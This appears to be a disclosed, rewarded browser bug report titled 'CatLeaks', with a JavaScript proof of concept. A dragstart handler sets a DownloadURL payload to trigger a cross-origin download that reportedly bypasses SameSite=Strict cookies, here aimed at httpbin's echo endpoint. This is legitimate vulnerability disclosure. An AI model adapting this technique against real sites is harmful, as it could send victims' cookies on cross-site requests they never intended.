CatLeaks (Awarded $1000)
Description YT
https://issuetracker.google.com/40060358 SameSite=Strict cookie bypass / cross-origin download via `e.dataTransfer.setData('DownloadURL', ...)` in a `dragstart` handler
// Drag source for the proof of concept: a plain anchor labelled "foo".
// No `draggable` attribute is set; anchors with an href are draggable by
// default, so `dragstart` fires as soon as the user starts dragging it.
const link = Object.assign(document.createElement('a'), {
  innerText: 'foo',
  href: '#',
});

// Bubble-phase listener (useCapture = false). The handler attaches the
// DownloadURL payload that the linked issue is about.
link.addEventListener('dragstart', onDragStart, false);
document.body.appendChild(link);
/**
 * `dragstart` handler that attaches a `DownloadURL` entry to the drag data.
 *
 * Security context (from the linked issue title): the download that results
 * from this drag payload is a cross-origin request initiated by the embedding
 * page, and it was reported as bypassing SameSite=Strict cookie protection.
 * The target here, httpbin's /get endpoint, echoes the request it received,
 * which presumably lets a tester see in the downloaded file whether cookies
 * were attached.
 *
 * Reviewer note: for sensitive GET endpoints, SameSite should be treated as
 * defence in depth rather than the only cross-site control.
 *
 * @param {DragEvent} e - The dragstart event; only `e.dataTransfer` is used.
 * @returns {void}
 */
function onDragStart(e) {
// Payload layout is "<MIME type>:<file name>:<URL>".
const downloadSpec = 'application/octet-stream:httpbin:https://httpbin.org/get';
const { dataTransfer } = e;

dataTransfer.setData('DownloadURL', downloadSpec);
// Permit every drop effect so the drop target is not restricted.
dataTransfer.effectAllowed = 'all';
}